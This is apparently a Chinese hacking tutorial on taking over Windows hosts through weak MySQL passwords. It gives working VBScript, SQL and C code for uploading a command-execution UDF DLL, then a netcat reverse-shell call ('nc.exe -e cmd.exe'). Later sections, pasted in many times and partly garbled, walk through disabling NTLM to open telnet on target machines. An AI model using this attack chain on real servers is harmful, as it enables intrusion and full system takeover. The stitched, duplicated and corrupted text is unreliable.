如何利用弱口令入侵MySQL数据库

如何利用弱口令入侵MySQL数据库,第1张

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!

首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF

DLL中自写的Function函数,而执行任意命令。

思路很简单,网上也有一些教程,但是他们要么没有给具体的代码,要么一句话代过,搞得象我似得小菜很难理解,终于在我付出了几天得不断测试得辛勤劳动后,有了点结果,我把详细过程和相关代码得交给大家,这样大家就可以自己写dll文件,自己生成不同文件得二进制码啦!

下面,我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码(网友Mix用的方法):

set @a =

concat('',0x0123abc1312389…..)

set @a = concat(@a,0x4658978abc545e……)

………………….

create table Mix(data LONGBLOB)//建表Mix,字段为data,类型为longblob

insert into Mix values("")update Mix set data = @a//@a插入表Mix

select

data from Mix into DUMPFILE 'C:\\Winnt\\文件名'//导出表中内容为文件

前两句很熟悉把,这个就是我们以前注入的时候,绕过’的解决办法,把代码的16进制数声明给一个变量,然后导入这个变量就行了。只不过这里,因为16进制代码是一个文件的内容,代码太长了,所以就用了concat函数不断把上次得代码类加起来,这样不断累计到一个变量a中。后面几句就很简单了,我都有注释。

后面三句好说,但是前面的那么多16进制数据,手工的话,累人啊!不过你还记得以前有一个exe2bat.vbs脚本吗?这次我们可以把这个脚本修改一下后,得到我们这里需要得mysql脚本!对比exe2bat.vbs生成得文件和我们需要脚本的文件格式,我们可以轻松的得到我们所需的脚本。脚本内容如下:

fp=wscript.arguments(0

fn=right(fp,len(fp)-instrrev(fp,"\"))

with

createobject("adodb.stream")

.type=1:.open:.loadfromfile

fp:str=.read:sl=lenb(str)

end with

sll=sl mod 65536:slh=sl\65536

with

createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

.write "set @a = concat('',0x"

for i=1 to sl

bt=ascb(midb(str,i,1))

if bt<16 then .write "0"

.write hex(bt)

if i mod 128=0 then

.write ")" vbcrlf "set @a = concat(@a,0x"

next

end with

好了,现在只要你把所要上传的文件拖到这个脚本图标上面,就可以生成一个同名的txt文件了。这个txt文件,就是我们所需要的mysql脚本,当然我们还需要修改一下这个txt文件(毕竟他是我们偷工减料得来的!),把最后一行生成的多余的那句“set

@a = concat('',0x”删除了,加上建表,插值得那三句代码即可!

脚本生成了,如何上传?先登陆mysql服务器:

C:\>mysql –u root –h hostip –p

Mysql>use mysql

//先进入mysql默认得数据库,否则你下一步的表将不知道属于哪个库

Mysql>\. E:\*.dll.txt

//这儿就是你生成的mysql脚本

按照上面输入命令,就可以看见屏幕文字飞快闪烁(当然网速要快啦),不一会你的文件旧上传完毕了!

下面到达我们的重点,我们上传什么dll文件?就目前我再网上看到的有两个已经写好的dll文件,一个是Mix写得mix.dll,一个是envymask写得my_udf.dll,这两个我都用过,都很不错,但是都也有点不足。先来看看具体的使用过程吧!

先用mix.dll:

登陆mysql,输入命令:

Mysql>\. e:\mix.dll.txt

Mysql>

CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll'

//这儿的注册的Mixconnect就是在我们dll文件中实现的函数,我们将要用他执行系统命令!

Mysql>select

Mixconnect('你的ip','8080')//填写你的反dip和端口

过一会儿,你监听8080端口的nc,就会得到一个系统权限的shell了!如图1:

这个的确不错,通过反d得到得shell可以传过一些防火墙,可惜的是,它的这个函数没有写得很好,只能执行一次,当你第二次连接数据库后,再次运行“select

Mixconnect('你的ip','8080')”的时候,对方的mysql会当掉!报错,然后服务停止!

所以,使用mix.dll你只有一次成功,没有再来一次的机会!另外根据我的测试,他对Win2003的系统好像不起作用。

再用my_udf.dll:

Mysql>\. C:\my_udf.dll.txt

Mysql>CREATE FUNCTION my_udfdoor

RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll'

//同样地,my_udfdoor也是我们注册后,用来执行系统命令得函数

Mysql>select my_udfdoor('’)

//这儿可以随便写my_udfdoor得参数,相当于我们只是要激活这个函数

好了,现在你可以不用关这个shell了,我们再开一个cmd,使用:

D:\>nc hostip 3306

*

4.0.*-nt x$Eo~MCG f**k //看到这个后,输入“f**k”

,他是my_udfdoor默认密码,自己无法更改

过一会儿,你就有了系统权限的shell了,

由于他是hook

recv版,所以穿墙的能力很强,我是在上一个mix.dll反d失败的情况下,才使用这个得,他果然不负所望!进系统后,发现它有双网卡,天网防火墙个人版V2.73,对外仅仅开放3306端口,由此可见,my_udf.dll确实有很强的穿透防火墙得能力!但是他也有一个bug,就是再我们连接激活这个函数后(就是使用了命令“select

my_udfdoor('’)”后),不管你是否连接,只要执行了:

Mysql>drop function my_udfdoor

后,mysql也汇报错,然后挂掉,

所以,你使用这个dll文件无法删除你的痕迹!

最后,然我们自己写一个自定义的dll文件。看能不能解决问题。

我们仅仅使用mysql 得udf的示例作模版即可!看他的示例:

#include <stdlib.h>

#include <winsock.h>

#include

<mysql.h>

extern "C" {

char *my_name(UDF_INIT *initid, UDF_ARGS

*args, char *is_null,

char *error)

// 兼容C

}

char

*my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

char *error)

{

char * me = "my name"

return me

// 调用此UDF将返回 my name

}

十分简单吧?好,我们只需要稍微改一下就可以有了自己的dll文件了:

下面是我的一个哥们Crackme是修改的:

#include

<stdlib.h>

#include <windows.h>

#include "mysql.h"

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS

*args, char *is_null, char *error)// sys_name就是函数名,你可以任意修改

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char

*is_null, char *error) //当然这儿的sys_name也得改!

{

char me[256] = {0}

if

(args->arg_count == 1){

strncpy(me,args->args[0],args->lengths[0])

me[args->lengths[0]]='\0'

WinExec(me,SW_HIDE)//就是用它来执行任意命令

}else

strcpy(me,"do nonthing.\n")

return me

}

好,我们编译成sysudf.dll文件就可以了!我们来用他实验一把!

看 *** 作:

Mysql>\.

C:\sysudf.dll.txt

Mysql>Create function sys_name returns string soname

'C:\\windows\\sysudf.dll'

Mysql>\. Nc.exe.txt //把nc.exe也上传上去

Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080')

//sys_name参数只有一个,参数指定要执行的系统命令

好,看看在Win2003中的一个反dshell了,

当然,我们你也可以不反dshell了,而去执行其他命令,只不过不论是否执行成功,都没有回显,所以要保证命令格式正确。对于这个dll文件,经过测试,不论何时“drop

function

sys_name”,都是不会报错的,同时也可以多次运行不同命令。至于他的缺点,就是他的穿墙能力跟Mix.dll一样不算太强,但对于实在穿不透的墙,直接运行其他命令就是最好的选择了。

上面三个dll文件可谓各有所短,如何选择,就看你遇到的实际情况了。

好了,从脚本得编写使用到dll文件编写使用,说了这么多,现在大家应该都会了吧?题目说的是弱口令得到系统权限,但是如果你在注入等其他过程中,爆出了config.php中的mysql密码,不也是可以使用的吗?这样我们岂不是也找到继Serv-u后又一大提权方法了吗?

SQL是数据库

8888,123456,sa,master,administrator,0000,9999等等,只要容易被猜出来的都是弱口令

SQL是Structured Quevy Language(结构化查询语言)的缩写。SQL是专为数据库而建立的 *** 作命令集,是一种功能齐全的数据库语言。在使用它时,只需要发出“做什么”的命令,“怎么做”是不用使用者考虑的。SQL功能强大、简单易学、使用方便,已经成为了数据库 *** 作的基础,并且现在几乎所有的数据库均支持SQL。 <br>

##1 二、SQL数据库数据体系结构 <br>

SQL数据库的数据体系结构基本上是三级结构,但使用术语与传统关系模型术语不同。在SQL中,关系模式(模式)称为“基本表”(base table);存储模式(内模式)称为“存储文件”(stored file);子模式(外模式)称为“视图”(view);元组称为“行”(row);属性称为“列”(column)。名称对称如^00100009a^: <br>

##1 三、SQL语言的组成 <br>

在正式学习SQL语言之前,首先让我们对SQL语言有一个基本认识,介绍一下SQL语言的组成: <br>

1.一个SQL数据库是表(Table)的集合,它由一个或多个SQL模式定义。 <br>

2.一个SQL表由行集构成,一行是列的序列(集合),每列与行对应一个数据项。 <br>

3.一个表或者是一个基本表或者是一个视图。基本表是实际存储在数据库的表,而视图是由若干基本砘蚱渌�油脊钩傻谋淼亩ㄒ濉?<br>

4.一个基本表可以跨一个或多个存储文件,一个存储文件也可存放一个或多个基本表。每个存储文件与外部存储上一个物理文件对应。 <br>

5.用户可以用SQL语句对视图和基本表进行查询等 *** 作。在用户角度来看,视图和基本表是一样的,没有区别,都是关系(表格)。 <br>

6.SQL用户可以是应用程序,也可以是终端用户。SQL语句可嵌入在宿主语言的程序中使用,宿主语言有FORTRAN,COBOL,PASCAL,PL/I,C和Ada语言等。SQL用户也能作为独立的用户接口,供交互环境下的终端用户使用。 <br>

##1 四、对数据库进行 *** 作 <br>

SQL包括了所有对数据库的 *** 作,主要是由4个部分组成: <br>

1.数据定义:这一部分又称为“SQL DDL”,定义数据库的逻辑结构,包括定义数据库、基本表、视图和索引4部分。 <br>

2.数据 *** 纵:这一部分又称为“SQL DML”,其中包括数据查询和数据更新两大类 *** 作,其中数据更新又包括插入、删除和更新三种 *** 作。 <br>

3.数据控制:对用户访问数据的控制有基本表和视图的授权、完整性规则的描述,事务控制语句等。 <br>

4.嵌入式SQL语言的使用规定:规定SQL语句在宿主语言的程序中使用的规则。 <br>

下面我们将分别介绍: <br>

##2 (一)数据定义 <br>

SQL数据定义功能包括定义数据库、基本表、索引和视图。 <br>

首先,让我们了解一下SQL所提供的基本数据类型:(如^00100009b^) <br>

1.数据库的建立与删除 <br>

(1)建立数据库:数据库是一个包括了多个基本表的数据集,其语句格式为: <br>

CREATE DATABASE <数据库名>〔其它参数〕 <br>

其中,<数据库名>在系统中必须是唯一的,不能重复,不然将导致数据存取失误。〔其它参数〕因具体数据库实现系统不同而异。 <br>

例:要建立项目管理数据库(xmmanage),其语句应为: <br>

CREATE DATABASE xmmanage <br>

(2) 数据库的删除:将数据库及其全部内容从系统中删除。 <br>

其语句格式为:DROP DATABASE <数据库名><br>

例:删除项目管理数据库(xmmanage),其语句应为: <br>

DROP DATABASE xmmanage <br>

2.基本表的定义及变更 <br>

本身独立存在的表称为基本表,在SQL语言中一个关系唯一对应一个基本表。基本表的定义指建立基本关系模式,而变更则是指对数据库中已存在的基本表进行删除与修改。 <br>

SQL是数据库

8888,123456,sa,master,administrator,0000,9999等等,只要容易被猜出来的都是弱口令

SQL是Structured Quevy Language(结构化查询语言)的缩写。SQL是专为数据库而建立的 *** 作命令集,是一种功能齐全的数据库语言。在使用它时,只需要发出“做什么”的命令,“怎么做”是不用使用者考虑的。SQL功能强大、简单易学、使用方便,已经成为了数据库 *** 作的基础,并且现在几乎所有的数据库均支持SQL。 <br>

##1 二、SQL数据库数据体系结构 <br>

SQL数据库的数据体系结构基本上是三级结构,但使用术语与传统关系模型术语不同。在SQL中,关系模式(模式)称为“基本表”(base table);存储模式(内模式)称为“存储文件”(stored file);子模式(外模式)称为“视图”(view);元组称为“行”(row);属性称为“列”(column)。名称对称如^00100009a^: <br>

##1 三、SQL语言的组成 <br>

在正式学习SQL语言之前,首先让我们对SQL语言有一个基本认识,介绍一下SQL语言的组成: <br>

1.一个SQL数据库是表(Table)的集合,它由一个或多个SQL模式定义。 <br>

2.一个SQL表由行集构成,一行是列的序列(集合),每列与行对应一个数据项。 <br>

3.一个表或者是一个基本表或者是一个视图。基本表是实际存储在数据库的表,而视图是由若干基本砘蚱渌�油脊钩傻谋淼亩ㄒ濉?<br>

4.一个基本表可以跨一个或多个存储文件,一个存储文件也可存放一个或多个基本表。每个存储文件与外部存储上一个物理文件对应。 <br>

5.用户可以用SQL语句对视图和基本表进行查询等 *** 作。在用户角度来看,视图和基本表是一样的,没有区别,都是关系(表格)。 <br>

6.SQL用户可以是应用程序,也可以是终端用户。SQL语句可嵌入在宿主语言的程序中使用,宿主语言有FORTRAN,COBOL,PASCAL,PL/I,C和Ada语言等。SQL用户也能作为独立的用户接口,供交互环境下的终端用户使用。 <br>

##1 四、对数据库进行 *** 作 <br>

SQL包括了所有对数据库的 *** 作,主要是由4个部分组成: <br>

1.数据定义:这一部分又称为“SQL DDL”,定义数据库的逻辑结构,包括定义数据库、基本表、视图和索引4部分。 <br>

2.数据 *** 纵:这一部分又称为“SQL DML”,其中包括数据查询和数据更新两大类 *** 作,其中数据更新又包括插入、删除和更新三种 *** 作。 <br>

3.数据控制:对用户访问数据的控制有基本表和视图的授权、完整性规则的描述,事务控制语句等。 <br>

4.嵌入式SQL语言的使用规定:规定SQL语句在宿主语言的程序中使用的规则。 <br>

下面我们将分别介绍: <br>

##2 (一)数据定义 <br>

SQL数据定义功能包括定义数据库、基本表、索引和视图。 <br>

首先,让我们了解一下SQL所提供的基本数据类型:(如^00100009b^) <br>

1.数据库的建立与删除 <br>

(1)建立数据库:数据库是一个包括了多个基本表的数据集,其语句格式为: <br>

CREATE DATABASE <数据库名>〔其它参数〕 <br>

其中,<数据库名>在系统中必须是唯一的,不能重复,不然将导致数据存取失误。〔其它参数〕因具体数据库实现系统不同而异。 <br>

例:要建立项目管理数据库(xmmanage),其语句应为: <br>

CREATE DATABASE xmmanage <br>

(2) 数据库的删除:将数据库及其全部内容从系统中删除。 <br>

其语句格式为:DROP DATABASE <数据库名><br>

例:删除项目管理数据库(xmmanage),其语句应为: <br>

DROP DATABASE xmmanage <br>

2.基本表的定义及变更 <br>

本身独立存在的表称为基本表,在SQL语言中一个关系唯一对应一个基本表。基本表的定义指建立基本关系模式,而变更则是指对数据库中已存在的基本表进行删除与修改。 <br>

……<br>

什么是Telnet

对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。

Telnet被入侵者用来做什么

(1)Telnet是控制主机的第一手段

在前几节介绍过,如果入侵者想要在远程主机上执行命令,需要建立IPC$连接,然后使用net time命令查看系统时间,最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命令,但相比之下,Telnet方式对入侵者而言则会方便得多。入侵者一旦与远程主机建立Telnet连接,就可以像控制本地计算机一样来控制远程计算机。可见,Telnet方式是入侵者惯于使用的远程控制方式,当他们千方百计得到远程主机的管理员权限后,一般都会使用Telnet方式进行登录。

(2)用来做跳板

入侵者把用来隐身的肉鸡称之为“跳板”,他们经常用这种方法,从一个“肉鸡”登录到另一个“肉鸡”,这样在入侵过程中就不会暴露自己的IP地址,这一过程将在第5章中详细介绍。

(3)关于NTLM验证

由于Telnet功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司为Telnet添加了身份验证,称为NTLM验证,它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外,还需要满足NTLM验证关系。NTLM验证大大增强了Telnet主机的安全性,就像一只拦路虎把很多入侵者拒之门外。

(4)使用Telnet登录

登录命令:telnet HOST [PORT]

断开Telnet连接的命令:exit

成功地建立Telnet连接,除了要求掌握远程计算机上的账号和密码外,还需要远程计算机已经开启“Telnet服务”,并去除NTLM验证。也可以使用专门的Telnet工具来进行连接,比如STERM,CTERM等工具。

Telnet典型入侵

(1)Telnet典型入侵步骤

步骤一:建立IPC$连接。其中sysback是前面建立的后门账号。

步骤二:开启远程主机中被禁用的Telnet服务。

步骤三:断开IPC$连接。

步骤四:去掉NTLM验证。如果没有去除远程计算机上的NTLM验证,在登录远程计算机的时候就会失败。

不过入侵者会使用各种方法使NTLM验证形同虚设。解除NTLM的方法有很多,下面列出一些常用的方法,来看看入侵者如何去除NTLM验证。

方法一

首先,在本地计算机上建立一个与远程主机上相同的账号和密码。

然后,通过“开始”→“程序”→“附件”找到“命令提示符”,使用鼠标右键单击“命令提示符”,然后选择“属性”,打开后如图所示

在“以其他用户身份运行(U)”前面“打钩”,然后单击“确定”按钮。接着,仍然按照上述路径找到“命令提示符”,用鼠标左键单击打开,得到如图所示对话框,键入“用户名”和“密码”。

单击“确定”按钮后,得到MS-DOS界面,然后用该MS-DOS进行Telnet登录,如图所示。

键入“telnet 192.168.27.128”命令并回车后,在得到的界面中键入“y”表示发送密码并登录。

远程主机为Telnet终端用户打开的Shell,在该Shell中输入的命令将会直接在远程计算机上执行。

比如,键入“net user”命令来查看远程主机上的用户列表,如图所示。

方法二

该方法使用工具NTLM.EXE来去除NTLM验证。首先与远程主机建立IPC$连接,然后将NTLM.EXE拷贝至远程主机,最后通过at命令使远程计算机执行NTLM.EXE。

计划任务执行NTLM.EXE后,便可键入“telnet 192.168.27.128”命令来登录远程计算机。

在该登录界面中键入用户名和密码,如果用户名和密码正确,便会登录到远程计算 机,得到远程计算机的Shell。

另外,还可以使用与opentelnet.exe相配套的程序resumetelnet.exe来恢复远程主机的NTLM验证,命令格式为“ResumeTelnet.exe \\\\server sername password”。

resumetelnet.exe关闭了目标主机的Telnet服务,恢复了NTLM验证。

从前面的介绍可以看出,即使计算机使用了NTLM验证,入侵者还是能够轻松地去除NTLM验证来实现Telnet登录。如果入侵者使用23号端口登录,管理员便可以轻易地发现他们,但不幸的是,入侵者通常不会通过默认的23号端口进行Telnet连接。那么入侵者究竟如何修改Telnet端口,又如何修改Telnet服务来隐蔽行踪呢?下面举一些常见的例子来说明这一过程,并介绍一下完成这一过程所需要的工具。

è X-Scan:用来扫出存在NT弱口令的主机。

è opentelnet:用来去NTLM验证、开启Telnet服务、修改Telnet服务端口。

è AProMan:用来查看进程、杀死进程。

è instsrv:用来给主机安装服务。

方法二

该方法使用工具NTLM.EXE来去除NTLM验证。首先与远程主机建立IPC$连接,然后将NTLM.EXE拷贝至远程主机,最后通过at命令使远程计算机执行NTLM.EXE。

计划任务执行NTLM.EXE后,便可键入“telnet 192.168.27.128”命令来登录远程计算机。

在该登录界面中键入用户名和密码,如果用户名和密码正确,便会登录到远程计算 机,得到远程计算机的Shell。

另外,还可以使用与opentelnet.exe相配套的程序resumetelnet.exe来恢复远程主机的NTLM验证,命令格式为“ResumeTelnet.exe \\\\server sername password”。

resumetelnet.exe关闭了目标主机的Telnet服务,恢复了NTLM验证。

从前面的介绍可以看出,即使计算机使用了NTLM验证,入侵者还是能够轻松地去除NTLM验证来实现Telnet登录。如果入侵者使用23号端口登录,管理员便可以轻易地发现他们,但不幸的是,入侵者通常不会通过默认的23号端口进行Telnet连接。那么入侵者究竟如何修改Telnet端口,又如何修改Telnet服务来隐蔽行踪呢?下面举一些常见的例子来说明这一过程,并介绍一下完成这一过程所需要的工具。

è X-Scan:用来扫出存在NT弱口令的主机。

è opentelnet:用来去NTLM验证、开启Telnet服务、修改Telnet服务端口。

è AProMan:用来查看进程、杀死进程。

è instsrv:用来给主机安装服务。

什么是Telnet

对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。

Telnet被入侵者用来做什么

(1)Telnet是控制主机的第一手段

在前几节介绍过,如果入侵者想要在远程主机上执行命令,需要建立IPC$连接,然后使用net time命令查看系统时间,最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命令,但相比之下,Telnet方式对入侵者而言则会方便得多。入侵者一旦与远程主机建立Telnet连接,就可以像控制本地计算机一样来控制远程计算机。可见,Telnet方式是入侵者惯于使用的远程控制方式,当他们千方百计得到远程主机的管理员权限后,一般都会使用Telnet方式进行登录。

(2)用来做跳板

入侵者把用来隐身的肉鸡称之为“跳板”,他们经常用这种方法,从一个“肉鸡”登录到另一个“肉鸡”,这样在入侵过程中就不会暴露自己的IP地址,这一过程将在第5章中详细介绍。

(3)关于NTLM验证

由于Telnet功能太强大,而且也是入侵者使用最频繁的登录手段之一,因此微软公司为Telnet添加了身份验证,称为NTLM验证,它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外,还需要满足NTLM验证关系。NTLM验证大大增强了Telnet主机的安全性,就像一只拦路虎把很多入侵者拒之门外。

(4)使用Telnet登录

登录命令:telnet HOST [PORT]

断开Telnet连接的命令:exit

成功地建立Telnet连接,除了要求掌握远程计算机上的账号和密码外,还需要远程计算机已经开启“Telnet服务”,并去除NTLM验证。也可以使用专门的Telnet工具来进行连接,比如STERM,CTERM等工具。

Telnet典型入侵

(1)Telnet典型入侵步骤

步骤一:建立IPC$连接。其中sysback是前面建立的后门账号。

步骤二:开启远程主机中被禁用的Telnet服务。

步骤三:断开IPC$连接。

步骤四:去掉NTLM验证。如果没有去除远程计算机上的NTLM验证,在登录远程计算机的时候就会失败。

不过入侵者会使用各种方法使NTLM验证形同虚设。解除NTLM的方法有很多,下面列出一些常用的方法,来看看入侵者如何去除NTLM验证。

方法一

首先,在本地计算机上建立一个与远程主机上相同的账号和密码。

然后,通过“开始”→“程序”→“附件”找到“命令提示符”,使用鼠标右键单击“命令提示符”,然后选择“属性”,打开后如图所示

在“以其他用户身份运行(U)”前面“打钩”,然后单击“确定”按钮。接着,仍然按照上述路径找到“命令提示符”,用鼠标左键单击打开,得到如图所示对话框,键入“用户名”和“密码”。

单击“确定”按钮后,得到MS-DOS界面,然后用该MS-DOS进行Telnet登录,如图所示。

键入“telnet 192.168.27.128”命令并回车后,在得到的界面中键入“y”表示发送密码并登录。

远程主机为Telnet终端用户打开的Shell,在该Shell中输入的命令将会直接在远程计算机上执行。

比如,键入“net user”命令来查看远程主机上的用户列表,如图所示。

方法二

该方法使用工具NTLM.EXE来去除NTLM验证。首先与远程主机建立IPC$连接,然后将NTLM.EXE拷贝至远程主机,最后通过at命令使远程计算机执行NTLM.EXE。

计划任务执行NTLM.EXE后,便可键入“telnet 192.168.27.128”命令来登录远程计算机。

在该登录界面中键入用户名和密码,如果用户名和密码正确,便会登录到远程计算 机,得到远程计算机的Shell。

另外,还可以使用与opentelnet.exe相配套的程序resumetelnet.exe来恢复远程主机的NTLM验证,命令格式为“ResumeTelnet.exe \\\\server sername password”。

resumetelnet.exe关闭了目标主机的Telnet服务,恢复了NTLM验证。

从前面的介绍可以看出,即使计算机使用了NTLM验证,入侵者还是能够轻松地去除NTLM验证来实现Telnet登录。如果入侵者使用23号端口登录,管理员便可以轻易地发现他们,但不幸的是,入侵者通常不会通过默认的23号端口进行Telnet连接。那么入侵者究竟如何修改Telnet端口,又如何修改Telnet服务来隐蔽行踪呢?下面举一些常见的例子来说明这一过程,并介绍一下完成这一过程所需要的工具。

è X-Scan:用来扫出存在NT弱口令的主机。

è opentelnet:用来去NTLM验证、开启Telnet服务、修改Telnet服务端口。

è AProMan:用来查看进程、杀死进程。

è instsrv:用来给主机安装服务。

方法二

该方法使用工具NTLM.EXE来去除NTLM验证。首先与远程主机建立IPC$连接,然后将NTLM.EXE拷贝至远程主机,最后通过at命令使远程计算机执行NTLM.EXE。

计划任务执行NTLM.EXE后,便可键入“telnet 192.168.27.128”命令来登录远程计算机。

在该登录界面中键入用户名和密码,如果用户名和密码正确,便会登录到远程计算 机,得到远程计算机的Shell。

另外,还可以使用与opentelnet.exe相配套的程序resumetelnet.exe来恢复远程主机的NTLM验证,命令格式为“ResumeTelnet.exe \\\\server sername password”。

resumetelnet.exe关闭了目标主机的Telnet服务,恢复了NTLM验证。

从前面的介绍可以看出,即使计算机使用了NTLM验证,入侵者还是能够轻松地去除NTLM验证来实现Telnet登录。如果入侵者使用23号端口登录,管理员便可以轻易地发现他们,但不幸的是,入侵者通常不会通过默认的23号端口进行Telnet连接。那么入侵者究竟如何修改Telnet端口,又如何修改Telnet服务来隐蔽行踪呢?下面举一些常见的例子来说明这一过程,并介绍一下完成这一过程所需要的工具。

è X-Scan:用来扫出存在NT弱口令的主机。

è opentelnet:用来去NTLM验证、开启Telnet服务、修改Telnet服务端口。

è AProMan:用来查看进程、杀死进程。

è instsrv:用来给主机安装服务。

FTP一般你没有设置密码或者太简单,密码跟帐号一样

检测的软件都会提示你弱口令

中国黑客联盟

东方@神起


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/sjk/6650818.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-03-26
下一篇 2023-03-26

发表评论

登录后才能评论

评论列表(0条)

保存